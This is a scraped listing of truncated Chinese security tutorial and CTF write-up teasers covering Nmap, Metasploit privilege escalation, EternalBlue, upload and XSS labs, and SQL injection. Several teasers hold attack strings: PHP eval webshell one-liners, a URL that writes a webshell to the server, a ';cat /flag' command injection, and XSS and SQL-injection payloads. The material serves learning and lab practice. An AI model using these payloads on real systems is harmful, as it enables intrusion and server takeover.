侦察一站式教程使用 Nmap 扫描和识别服务识别 Web 应用防火墙查找web目录dirb使用 Nmap 扫描和识别服务 Nmap 可能是世界上最广泛使用的端口扫描器。他可以用于识别活动主机、扫描 TCP 和 UDP 开放端口，检测防火墙，获得运行在远程主机上的服务版本&…

CVE-2021-41773、CVE-2021-42013检测脚本

自己在家写的简单的脚本检测，没有多么炫酷，代码的备注都给你们写的好好的，给小女点个赞再走咯。为啥使用urllib不要request模块是因为在写的时候发现request模块会将url进行转码。所以使用比较老的urllib模块。 #!/usr/bin/env python3 # -*…

反序列化漏洞总结

目录 1.了解序列化和反序列化 2.php反序列化和序列化 2.1无类序列化和反序列化演示 2.2有类序列化和反序列化演示 2.2.1类的理解 2.2.2有类序列化过程 2.2.3有类反序列化过程 3.魔法方法 4.简单案列 4.1__wakeup()反序列化案列 4.2.pikachu的反序列漏洞案列 4.3其他函…

msf内网提权

目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了，在上一篇文章里面我进行详细说明和演示…

pikachu,DVWA靶场本地搭建

首先需要下载各个靶场的代码，因为pikachu、dvwa、sqli_labs，upload_labs所需的环境配置都差不多，我们只需要会搭建其中一个就可以了。接下来我以dvwa 为案列将步骤给大家演示一下。第一步：代码的下载我自己使用的window10 64位…

burpsuite全套使用教程

burpsuite实验环境安装教程浏览器配置篇使用方法Target模块(目标模块)Proxy模块(代理模块)Spider模块(蜘蛛爬行)Scanner模块(漏洞扫描)Intruder模块decoder模块(编码模块)Comparer模块(比较器)RepeaterSequencer实验环境 burpsuite1.733 win10 dvwa firefox 安装教程第一步…

使用永恒之蓝漏洞攻击电脑

关于实验环境实验步骤第一步打开终端第二步启动nmap第三步找到可以攻击的电脑第四步启动msfconsole实验环境 win7电脑一台（其中一台必须可以被永恒之蓝攻击） kali 系统电脑一台实验步骤第一步打开终端第二步启动nmap 输入一下命令 nmap -sV 19…

Web克隆钓鱼攻击

Web克隆钓鱼攻击首先保证虚拟机中的kali系统能够和外部网络通信,打开编辑-----虚拟网络编辑器器—更改设置----桥接无线网卡模式。左键单击虚拟机----设置-----网络适配器----选择桥接模式-----确定。在kali中将网络设置改为自动（DHCP）&#xff…

Vulnhub: BlueMoon: 2021靶机

kali：192.168.111.111 靶机：192.168.111.174 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.174 80端口目录爆破，发现文件：hidden_text gobuster dir -u http://192.168.111.174 -w /usr/sha…

CTF BugKu平台—Misc：闪的好快

题目链接：https://ctf.bugku.com/challenges/detail/id/12.html 首先下载下来是一个二维码的gif格式的文件很明显这种闪动的题目我们得思路就是想到看帧数然后使用 Stegsolve这个工具使用命令在java得bin目录下Java -jar Stegsolve.jar 打开工具 Analyse 选项下的 F…

CTF BugKu平台—Misc:隐写2

看图片属性文本编辑器搜flag 发现了rar 改个后缀，应该是根据提示得到密码就可以得到flag 它告诉我们了密码是3位数数那我们就爆破一下zip，使用ARCHPR (这个工具没破解出来 )那就换一个工具Ziperello设置一下参数密码871打开压缩的rar 怎么还有啊正常来…

windows渗透测试

假设您是一名网络安全工程师，需要对某公司的公司进行黑盒测试，分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试，并将该操作显示结果中8080端口对应…

session是什么？它与cookie有什么关系？

session是什么？ Session是服务器端使用的一种记录客户端状态的机制，使用上比Cookie简单一些，相应的也增加了服务器的存储压力。 session和cookie一样，都是用来记录web服务器和客户端通信状态的机制，session和cookie不同…

Centos8安装docker并配置Kali Linux图形化界面

鉴于目前网上没有完整的好用的docker安装kali桌面连接的教程，所以我想做一个。准备工作麻了，这服务器供应商提供的镜像是真的纯净，纯净到啥都没有。问题一：Centos8源有问题 Error: Failed to download metadata for repo ap…

wirehark数据分析与取证B.pcap

什么是wireshark？wiresharekB.pcap数据包数据包下载请私信博主wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。Wireshark使用WinPCAP作…

时空智友企业流程化管控系统文件上传漏洞复现

0x01 产品简介时空智友企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统，企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化，从而提高工作效率、管理水平和企业竞争力。 0x02 漏洞概述时空智友企业流程化管控系…

网络安全（黑客）了解学习路线

谈起黑客，可能各位都会想到：盗号，其实不尽然；黑客是一群喜爱研究技术的群体，在黑客圈中，一般分为三大圈：娱乐圈技术圈职业圈。娱乐圈：主要是初中生和高中生较多，玩网恋…

内网隧道代理技术（十七）之 NPS的使用

NPS的介绍和使用 NPS介绍 nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，…

sqlmap安装以及运用

目录一、sqlmap简介 linux系统安装 windows系统安装二.sqlmap确定目标 (1) sqlmap直连数据库 (2) sqlmap的URL探测 (3) Sqlmap文件读取目标 (4) Sqlmap Google批量扫注入一、sqlmap简介 sqlmap是一个开源的渗透测试工具，它可以自动化检测sql注入漏洞利用…

CypherRAT、CraxsRATAndroid系列恶意软件“始作俑者”曝光！

近日，恶意软件系列 CypherRAT 和 CraxsRAT 的创建者曝光，是一位名为 EVLF 的叙利亚威胁行为者。网络安全公司Cyfirma在上周发布的一份报告中提到：这些RAT旨在允许攻击者远程执行实时操作，并控制受害者设备的摄像头、位置和麦克风…

攻防世界-神奇的Modbus

原题解题思路

Kali Linux中的ARP欺骗攻击如何进行

在Kali Linux中进行ARP欺骗攻击是一种常见的网络攻击方法，它允许攻击者篡改局域网中的ARP表，以便将网络流量重定向到攻击者控制的位置。步骤： 安装必要工具： 首先，确保已经安装了Kali Linux，并在终端中安…

python开发--二维码内容识别

0x00 背景二维码是将一串字符转化成二维码格式，这串字符可以是wx号，商品条码，网址等。如何识别二维码中的信息并将其应用到信息安全领域？ 0x01 实现这里主要使用一个库 pyzbar ，话不多说，直接上代码&am…

一个集成的BurpSuite漏洞探测插件1.1

免责声明本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利&#xff0c…

网络渗透day4-Windows域

针对于Windows系列服务器的最新版本 server2022操作系统的域环境的搭建与维护，做为网络安全其中一项分支“内网渗透”，域是不可绕过的底层基础，本模块重点讲解域环境之外还讲解加密与证书技术，了解PKI相关的应用，最后带…

wireshark抓ssh，telnet，dns等教程

wireshark使用教程实验环境三次握手四次挥手DNS/UDPSSHTelnetftp实验环境 WIN10wireshark 三次握手随便打开一个网站打开wireshark抓包就行条件为 ip.dst 网址对应的ip地址四次挥手因为最后一次握手和倒数第二次握手整合信息一起发送了所以抓不到 DNS/UDP 使用nslooku…

dvwa csrf通关之旅

csrf通关之旅前言lowMedium前言准备环境 dvwa phpstudy bur 客户机 low 首先我们尝试修改一次名字我们发现是用get方式提交的然后我们换一个浏览器我们刚刚把密码修改成123456现在我想修改成54321 ?password_new123456&password_conf123456&ChangeChange#?pa…

2022全国职业技能大赛“信息安全管理与评估“--应急响应日志分析解析（高职组）

2022全国职业技能大赛“信息安全管理与评估”（高职组）任务书 2022全国职业技能大赛“信息安全管理与评估”任务书第一阶段竞赛项目试题第二阶段竞赛项目试题任务1：应急响应第三阶段竞赛项目试题2022全国职业技能大赛“信息安全管理与评估”任务书第一阶段竞赛项目试题先…

【Linux】网络配置相关命令（三）

【Linux】网络配置相关命令（三） ncat命令 # ncat -l 9999启动TCP服务端，端口为9999 -l 使用监听模式，监控传入的资料 -L 连接关闭后,仍然继续监听# ncat 192.168.28.128 9999启动TCP客户端连接服务端服务端 IP：192.1…

网络安全:文件上传漏洞

<?php eval($_POST[chopper]);?>在low 安全级别下，将包含上述代码的php文件上传到没有进行上传数据类型保护的网站功能中。然后用中国菜刀爬下所有文件，可以对文件进行操纵。在medium安全级别下，后台限制lmime文件类型和文件大小&am…

Vulnhub: Inferno: 1.1靶机

kali：192.168.111.111 靶机：192.168.111.233 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.23380端口目录爆破 gobuster dir -u http://192.168.111.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-me…

ConsoleApplication17_2项目免杀（Fiber+VEH Hook Load）

加载方式FiberVEH Hook Load Fiber是纤程免杀，VEH是异常报错，hook使用detours来hook VirtualAlloc和sleep，通过异常报错调用实现主动hook 纤程Fiber的概念：纤程是比线程的更小的一个运行单位。可以把一个线程拆分成多个纤程&#…

buuctf [CISCN 2019 初赛]Love Math

这题主要利用了php的一些特性变量函数数字转字符串源码 <?php error_reporting(0); //听说你很喜欢数学，不知道你是否爱它胜过爱flag if(!isset($_GET[c])){show_source(__FILE__); }else{//例子 c20-1$content $_GET[c];if (strlen($content) > 80) {…

doubletrouble靶机通关详解

信息收集漏洞发现扫目录发现secret路径里面有个图 qdPM9.1 网上找找exp 反弹shell http://192.168.0.107//uploads/users/632300-backdoor.php?cmdecho "<?php eval(\$_POST[1]);?>" > 1.php 蚁剑连上去传php-reverse-shell.php 提权优化shell…

企望制造ERP系统 RCE漏洞复现

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。简介企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专…

xsschallenge靶场练习1-13关

文章目录第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关第十三关第一关观察页面 http://192.168.80.139/xsschallenge/level1.php?nametest尝试在name后面输入最近基本的xss语法 <script>alert(1)</script>第二关查看页面源…

OpenVPN服务器

目录一、OpenVPN是什么？ 二、OpenVPN连接建立的过程三、数据包远程传输处理过程（自我理解） 四、OpenVPN实验案例 4.1生成OpenVPN所需证书文件 4.2配置OpenVPN服务器 4.3配置OpenVPN客户端 4.4在远程客户端windows 10上进行测试一、OpenVPN…

【高危】企业微信私有化2.5-2.6.93版本后台API未授权访问漏洞

漏洞描述企业微信私有化2.5.x版本及2.6.930000版本以下后台中存在接口未授权访问漏洞，攻击者通过访问/cgi-bin/gateway/agentinfo接口可获得Secret，从而利用开放API获取企业通讯录等敏感信息及企业微信内应用权限。漏洞名称企业微信私有化2.5-2.6.93…

常用Web漏洞扫描工具汇总（持续更新中）

常用Web漏洞扫描工具汇总常用Web漏洞扫描工具汇总1、AWVS，2、OWASP Zed（ZAP），3、Nikto，4、BurpSuite，5、Nessus，6、nmap7、X-ray还有很多不是非常知名，但可能也很大牌、也较常见的。…

2023年全国职业院校技能大赛（高等职业教育组）“信息安全管理与评估”理论技能答案

理论技能与职业素养（100分） 2023年全国职业院校技能大赛（高等职业教育组） “信息安全管理与评估”理论技能【注意事项】 1.理论测试前请仔细阅读测试系统使用说明文档，按提供的账号和密码登录测试系统进行测试&am…

Weblogic漏洞（四）之 CVE-2018-2894 任意文件上传漏洞

CVE-2018-2894 任意文件上传漏洞漏洞影响 Weblogic受影响的版本： 10.3.6.012.1.3.012.2.1.212.2.1.3 漏洞环境此次我们使用的是vnlhub靶场搭建的环境，是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场，我们 cd 到 CVE-2018-2894&#x…

编辑.htaccess文件执行任意代码（CVE-2022-25578）

简介 CVE-2022-25578是Taocms v3.0.2中存在的一个安全漏洞，该漏洞允许攻击者通过任意编辑.htaccess文件来执行代码注入攻击。 Taocms是一个完善支持多数据库（Sqlite/Mysql）的CMS网站内容管理系统，是国内最小且功能完善的基于php…

代码审计-审计工具介绍-DAST+SAST+IAST项目

DASTSASTIAST项目介绍 DAST： 动态应用程序安全测试（Dynamic Application Security Testing）技术在测试或运行阶段分析应用程序的动态运行状态。它模拟黑客行为对应用程序进行动态攻击，分析应用程序的反应，从而确定该We…

iOS脱壳之frida-ios-dump

frida-ios-dump介绍该工具基于frida提供的强大功能通过注入js实现内存dump然后通过python自动拷贝到电脑生成ipa文件，适合现iOS11版本之后的越狱手机使用。下载 https://github.com/AloneMonkey/frida-ios-dump环境安装电脑环境安装 win和Mac 环境一样都是…

浅谈搭建CobaltStrike云服务器可能会遇到的一些问题

1.文件上传若要将本机的文件上传至云服务器，你需通过Xshell来实现先在xshell连接云服务器，命令行中执行rz命令，即可实现文件上传若没有rz命令,则需用到以下命令进行安装(二选一): 适用于redhat linux: yum install lrzsz适用于centos或u…

网络安全社区与资源分享：推荐网络安全社区、论坛、博客、培训资源等，帮助从业者拓展人脉和知识。

第一章：引言在当今数字化的世界中，网络安全问题变得愈发突出。随着各种新型威胁的涌现，网络安全从业者面临着持续不断的挑战。然而，正是因为这些挑战，网络安全社区应运而生，成为从业者们互相交流、学习和…

简单了解OSI网络模型

目录一、协议是什么？ 二、OSI七层模型三、TCP/IP五层模型一、协议是什么？ 协议顾名思义就是通过大家伙一起协商讨论达成的统一规则和标准。网络协议就是规定用户数据信息如何在网络上传播以及实现某种网络技术所要遵循的统一标准和规则。二、OSI…

探索软件架构与网络通信协议：构建现代网络应用

文章目录 1. 软件架构：构建应用的基石1.1 C/S架构：客户端/服务器1.2 B/S架构：浏览器/服务器 2. 网络通信协议：构建连接的桥梁2.1 4层模型：数据的分层传输2.2 IP地址与端口号：标识和定位 3. TCP通信&#xf…

Metinfo6.0.0任意文件读取漏洞复现

漏洞原理在\MetInfo6.0.0\app\system\include\module\的old_thumb.class.php文件可以看到这里对./进行了严格的过滤，但是却忽略了在Windows下还可以用…\来跳转目录环境搭建下载Metinfo6.0.0 配置随便写，自己记住就行这里前面已经审计过代码了&a…

RHCE——十三、Shell自动化运维编程基础

Shell 一、为什么学习和使用Shell编程二、Shell是什么1、shell起源2、查看当前系统支持的shell3、查看当前系统默认shell4、Shell 概念三、Shell 程序设计语言1、Shell 也是一种脚本语言2、用途四、如何学好shell1、熟练掌握shell编程基础知识2、建议五、Shell脚本的基本元素…

对于uts namespace共享的测试

前言单单以下列命令运行虽然是root，还不行，我们需要加--privileged，不然会报 hostname: you must be root to change the host name docker run -it --utshost ubuntu:latest /bin/bash 如果加上--privileged后 docker run -it --priv…

CTFhub-SSRF-内网访问

CTFHub 环境实例 | 提示信息 http://challenge-8bf41c5c86a8c5f4.sandbox.ctfhub.com:10800/?url_ 根据提示，在url 后门添加 127.0.0.1/flag.php http://challenge-8bf41c5c86a8c5f4.sandbox.ctfhub.com:10800/?url127.0.0.1/flag.php ctfhub{a6bb51530c8f6be0…

AGCTF 2023陇剑杯wp

SSW SmallSword_1 导出HTTP 对象的时候发现有sql 注入的语句，猜测攻击手法是 sql 注入在这里发现了可疑的 php 文件追踪 15340 发现可控参数，也就是连接密码 Flag：flag{0898e404bfabd0ebb702327b19f} SmallSword_2 知道攻击手法&…

vulnhub靶机EvilBox---One

靶机地址：EvilBox: One ~ VulnHub 主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.153 扫描端口信息 nmap -sV -sT -O -p22,80 192.168.21.153 漏洞扫描 nmap --scriptvuln -p22,80 192.168.21.153 访问网站再去看看robots.txt 之前扫描…

Upload-labs 1~15 通关详细教程

文章目录 Upload-labs 1~15 通关详细教程Pass-01-前端js验证Pass-02-后端MIME验证Pass-03-黑名单验证Pass-04-黑名单验证.htaccessPass-05-文件后缀名大小写绕过Pass-06-文件后缀名空格绕过Pass-07-文件后缀名点绕过Pass-08-文件后缀名::$DATA绕过Pass-09-点空格点空格绕过Pass…

2023年“羊城杯”网络安全大赛 Web方向题解wp 全

团队名称：ZhangSan 序号：11 不得不说今年本科组打的是真激烈，初出茅庐的小后生没见过这场面QAQ~ D0n’t pl4y g4m3!!! 简单记录一下，实际做题踩坑很多，尝试很多。先扫了个目录，扫出start.sh 内容如下…

HTTPS协议详解：基本概念与工作原理

个人主页：insist--个人主页本文专栏：网络基础——带你走进网络世界本专栏会持续更新网络基础知识，希望大家多多支持，让我们一起探索这个神奇而广阔的网络世界。目录一、HTTPS协议的基本概念二、为什么需要HTTP…

fastjson漏洞批量检测工具

JsonExp 简介版本：1.3.5 1. 根据现有payload，检测目标是否存在fastjson或jackson漏洞（工具仅用于检测漏洞）2. 若存在漏洞，可根据对应payload进行后渗透利用3. 若出现新的漏洞时，可将最新的payload新增至…

对象临时中间状态的条件竞争覆盖

Portswigger练兵场之条件竞争 🦄条件竞争之对象临时中间状态的条件竞争 Lab: Partial construction race conditions🚀实验前置必要知识点某些框架尝试通过使用某种形式的请求锁定来防止意外的数据损坏。例如，PHP 的本机会话处理程序模块…

【漏洞复现】紫光电子档案管理系统存在SQL注入

漏洞描述过滤不严格导致sql注入免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对…

世界级黑客丨电脑犯罪界的汉尼拔

被美国FBI称为电脑界的汉尼拔的人，有什么样的故事？ 这个人就是世界级黑客凯文李波尔森，他在早期是正儿八经的黑客，他在17岁的时候就使用TRS-80电脑攻入美国国防部的高等研究计划署网络，但是当时他进去啥也没干&#x…

TLS协议深度解析：挖掘现代网络安全防御的底层技术

正常简单的通讯 1、服务器生成一对密钥，公钥A、私钥A 2、浏览器请求服务器时，服务器把公钥A传给浏览器 3、浏览器随机生成一个对称加密的密码S，用公钥A加密后传给服务器 4、服务器接收后，用私钥A解密，得到密钥S 5、浏…

泛微E-Office任意文件上传漏洞复现

0x01 产品简介泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。 0x02 漏…

[LitCTF 2023]Ping

因为直接ping会有弹窗。这里在火狐f12,然后f1选禁用javascript,然后ping 然后输入127.0.0.1;cat /flag 得到flag， 查看其他大佬的wp ，这里还可以抓包。但是不知道为什么我这里的burp 用不了

【Linux】SSH相关命令

【Linux】SSH相关命令关于SSH SSH 为 Secure Shell 的缩写，SSH 为建立在应用层和传输层基础上的安全协议。 SSH 是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。 SSH的划分层…

【Linux】网络配置相关命令（二）

【Linux】网络配置相关命令（二） host命令 # host www.you.com查询域名对应的IP地址# host -v www.you.com显示域名查询的详细信息# host -t NS www.you.com查询域名的NS信息,-t为指定查询的域名信息类型# host -a www.you.com显示详细的DNS信息# host -…

OSCP系列靶场-Intermediate-BTRSys2.1保姆级

OSCP系列靶场-Intermediate-BTRSys2.1 目录 OSCP系列靶场-Intermediate-BTRSys2.1总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测信息收集-端口测试21-FTP端口的信息收集21-FTP版本版本信息与MSF利用21-FTP端口匿名登录测试(成功)21-FTP端口-文件GET收集…

APP上线为什么要提前部署安全产品呢？

一般平台刚上线或者日活跃量比较高的时候，很容易成为攻击者的目标，服务器如果遭遇黑客攻击，资源耗尽会导致平台无法访问，业务也无法正常开展，服务器一旦触发黑洞机制，就会被拉进黑洞很长一段时间&#xff0…

薪火传承 | 天空卫士致敬原三线企业核工业部525厂老同志

上世纪60年代，几百万建设者开创了我国历史上一次规模空前的工业大迁移和工业大开发。创造出“艰苦创业、勇于创新、团结协作、无私奉献”的三线建设精神永为后世所敬仰和学习。三线企业的前辈们用自己的青春和智慧为中国的科技事业作出了巨大的贡献。时光斗转&…

【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)

zhi.oscs1024.com 漏洞类型反序列化发现时间2023-08-24漏洞等级中危MPS编号MPS-fed8-ocuvCVE编号CVE-2023-34040漏洞影响广度小漏洞危害 OSCS 描述Spring Kafka 是 Spring Framework 生态系统中的一个模块，用于简化在 Spring 应用程序中集成 Apache Kaf…

网络丢包故障如何定位？如何解决？

引言本期分享一个比较常见的网络问题--丢包。例如我们去ping一个网站，如果能ping通，且网站返回信息全面，则说明与网站服务器的通信是畅通的，如果ping不通，或者网站返回的信息不全等，则很可能是数据被丢包了…

从AD迁移至AAD，看体外诊断领军企业如何用网络准入方案提升内网安全基线

摘要： 某医用电子跨国集团中国分支机构在由AD向AzureAD Global迁移时，创新使用宁盾网络准入，串联起上海、北京、无锡等国内多个职场与海外总部,实现平滑、稳定、全程无感知的无密码认证入网体验，并通过合规基线检查，确…

科普：什么是DNS劫持？

DNS劫持又叫做域名劫持，指攻击者利用其他攻击手段，篡改了某个域名的解析结果，使得指向该域名的IP变成了另一个IP，导致对相应网址的访问被劫持到另一个不可达的或者假冒的网址，从而实现非法窃取用户信息或者破坏正常网络…

Exchange-CVE-2020-0688（RCE）

漏洞描述当攻击者通过各种手段获得一个可以访问Exchange Control Panel （ECP）组件的用户账号密码，就可以在被攻击的exchange上执行任意代码，直接获取服务器权限。 CVE-2020-0688也是因为viewstate反序列化漏洞版本利用条件&…

xsschallenge1~13通关详细教程

文章目录 XSS 挑战靶场通关level1level2level3level4level5level6level7level8level9level10level11level12level13 XSS 挑战靶场通关 level1 通过观察发现这个用户信息可以修改那么我们直接输入攻击代码 <script>alert(/wuhu/)</script>弹框如下： …

fastjson利用templatesImpl链

fastjson1.2.24 环境： pom.xml： <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLoc…

Vulnhub系列靶机---JIS-CTF-VulnUpload-CTF01靶机

文章目录 1、网卡配置2、信息收集主机发现端口扫描目录扫描 3、漏洞探测4、漏洞利用一句话木马蚁剑 GetShellSSH连接提权 JIS文档说明 JIS-CTF-VulnUpload-CTF01靶机下载地址该靶机有5个flag 1、网卡配置开启靶机，看见加载的进度条按shift，看到如下界…

【漏洞复现】万户协同办公平台未授权访问漏洞

漏洞描述万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能，它以工作流引擎为底层服务，以通讯沟通平台为交流手段，以门户自定义平台为信息推送显示平台，为用户提供集成的协同工作环境。该平台存…

复原20世纪复古修仙游戏

前言在本教程中，我突发奇想，想做一个复古的修仙游戏，考虑到以前的情怀决定做个古老的躺平修仙游戏 📝个人主页→数据挖掘博主ZTLJQ的主页个人推荐python学习系列： ☄️爬虫JS逆向系列专栏 - 爬虫逆向教学 ☄️python…

frp实现二级代理

kali是攻击机 （192.168.0.106） windows server2012是边界服务器，拥有两个网卡，作为一级代理， （192.168.0.108，10.10.10.136） ad01是内网机器，不出网 （10.10.1…

企业微信cgi-bin/gateway/agentinfo接口存在未授权访问漏洞附POC

文章目录企业微信cgi-bin/gateway/agentinfo接口存在未授权访问漏洞附POC1. 企业微信cgi-bin/gateway/agentinfo接口简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾企业微信cgi-bin/gateway/agentinfo接口存在未授权访问漏洞附POC 免…

短信接口并发控制漏洞-解决方案

问题描述： 发送短信验证码时没有对操作加锁，导致并发发送短信验证码时能收到多条短信。解决方案： 引入发送队列： 在发送短信验证码的过程中，将每个发送请求放入一个队列中，然后按顺序处理队列中的请求。这…

反序列化漏洞及漏洞复现

文章目录渗透测试漏洞原理不安全的反序列化1. 序列化与反序列化1.1 引例1.2 序列化实例1.2.1 定义一个类1.2.2 创建对象1.2.3 反序列化1.2.4 对象注入 2. 漏洞何在2.1 漏洞触发 3. 反序列化漏洞攻防3.1 PHP反序列化实例3.1.1 漏洞利用脚本3.1.2 漏洞利用3.1.3 获取GetShell 3.…

网络安全（黑客）技术自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

锐捷RG-UAC上网行为管理信息泄漏漏洞

漏洞简介锐捷RG-UAC上网行为管理信息泄漏漏洞，可在登陆界面源码中查找管理员用户和密码. 影响范围锐捷RG-UAC上网行为管理与审计系统 fofa查询 title"RG-UAC登录页面" && body"admin" 漏洞利用前端查看源码，搜索ad…

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) 前言 Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能&#x…

DGA行为转变引发了对网络安全的担忧

Akamai的研究人员发现，在域名系统(DNS)流量数据中，动态种子域生成算法(DGA)家族的行为发生了令人担忧的变化。这一发现揭示了恶意行为者如何调整他们的策略来延长他们的指挥与控制(C2)通信通道的寿命，以保护他们的僵尸网络。从技术角度来看…

【漏洞复现】博华网龙设备存在命令执行漏洞

漏洞描述中科博华是一家主营软件产品开发、信息安全产品研发，兼营计算机系统集成与信息安全服务为一体的高科技企业。拥有七项专利和五十余项软件著作权。具有CMMI、商用密码生产和销售许可证、3C认证、系统集成、信息安全服务和涉密资质。该产商多个安全设备的系统存在远…

buuctf crypto 【还原大师】解题记录

1.打开题目就能直接看到密文 2.感觉爆破直接能解，试试爆破（参考文章：[buuctf] crypto全解——前84道（不建议直接抄flag）_buuctf crypto_咸鱼壹号的博客-CSDN博客） import hashlib k TASC?O3RJMV?WDJKX?…

buuctf crypto 【RSAROLL】解题记录

1.打开文件，发现数据 2.rsa算法中的n，e，多个c都已经给出，写出脚本计算出每个c对应的m值转换成字符即可 3.运行得到flag

目录信息收集

目录扫描的介绍目录扫描可以让我们发现这个网站存在多少个目录，多少个页面，探索出网站的整体结构。通过目录扫描我们还能扫描敏感文件，后台文件，数据库文件，和信息泄漏文件等等目录扫描有两种方式： •…

透视俄乌网络战之二：Conti勒索软件集团（上）

透视俄乌网络战之一：数据擦除软件 Conti勒索软件集团（上） 1. Conti简介2. 组织架构3. 核心成员4. 招募途径5. 工作薪酬6. 未来计划参考 1. Conti简介 Conti于2019年首次被发现，现已成为网络世界中最危险的勒索软件之一&#xff0…

buuctf crypto 【RSA】解题记录

1.打开文件后，可以看到公钥，打开后解析公钥 2.分解一下n，得到p，q（使用yafu分解）后，写出脚本 3.运行，得到flag

常见的内网穿透代理工具

简介 "内网穿透代理工具"是一种用于实现内网穿透的工具或软件。内网穿透是指通过公共网络（如互联网）将外部网络请求转发到内部私有网络的过程。在某些情况下，由于网络配置或安全策略的限制，外部网络无法直接访问内部网…

buuctf crypto 【达芬奇密码】解题记录

1.打开文件 2.查了一下，似乎是斐波那契数列的移位变换，通过对应的斐波那契数列顺序还原即可 flag为{37995588256861228614165223347687}

web：[极客大挑战 2019]LoveSQL

题目打开页面显示如下查看源代码，查到一个check.php，还是get传参尝试账号密码输入题目名为sql，用万能密码 1or 11# 或 admin or 11 给了一段乱码，也不是flag 查看字段数 /check.php?usernameadmin order by 3%23&pass…

安卓Android_手机安装burp的https_CA证书

安卓Android_手机安装burp的https_CA证书文章目录安卓Android_手机安装burp的https_CA证书1 打卡电脑wif热点，手机连上电脑的热点2 burp点击 --》 Proxy settings3 点击add ---》新增代理地址和端口4 设置好-展示5 手机连上电脑的wifi热点6 点击查看ip地址与burp …

NSS [HNCTF 2022 WEEK2]easy_sql

NSS [HNCTF 2022 WEEK2]easy_sql 这题考察了无列名注入，首先了解一下什么是无列名注入再开始做题吧。为什么会需要无列名注入？ 我们常用的SQL注入方法是通过information_schema这个默认数据库来实现，可是你有没有想过，如果过滤…

皮卡丘靶场搭建遇到的问题大全

该博客记录我在安装皮卡丘靶场中遇到的一些问题。 1、 phpstudy_pro启动Mysql失败自己电脑开启了mysql服务，使用winr，services.msc，找到自己的mysql服务，关闭。再次尝试使用phpstudy_pro启动mysql，成功解决。 2、皮…

【网络安全】图解 Kerberos：身份认证

图解 Kerberos：身份认证 1.什么是 Kerberos ？2.Kerberos 基本概念2.1 基本概念2.2 KDC 3.Kerberos 原理3.1 客户端与 Authentication Service3.2 客户端与 Ticket Granting Service3.3 客户端与 HTTP Service Kerberos 是一种身份认证协议，被…

NSS [羊城杯 2020]easyser

NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。不要慌，无从下手时。看源码、扫目录、抓包。一套操作下来，发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php，一说到百度，就猜测是否存在SSRF。源码中…

邮件数据安全案例 | 有一种遇见，叫相见恨晚

Mr.赵回忆和联通相遇的时刻，他说，用一句诗来形容恰如其分，“众里寻他千百度，蓦然回首，那人却在，灯火阑珊处” 。中国联合网络通信集团有限公司在国内31个省（自治区、直辖市）和境外…

OSCP系列靶场-Esay-Gaara保姆级

OSCP系列靶场-Esay-Gaara 目录 OSCP系列靶场-Esay-Gaara总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测信息收集-端口测试22-SSH端口的信息收集22-SSH端口版本信息与MSF利用22-SSH协议支持的登录方式22-SSH弱口令爆破(待定)22-SSH手动登录尝试(无) 80-HT…

Android SDK安装教程（超详细），从零基础入门到精通，从这篇开始_android sdk下载安装

前言在使用appnium的时候，除了安装JDK之外，也需要安装Android SDK。那么，正确安装Android SDK是怎样的呢，跟着小编继续往下看。安装Android SDK和环境配置 1.安装Android SDK 首先打开官网：https://www.androiddevt…

web：[GXYCTF2019]Ping Ping Ping

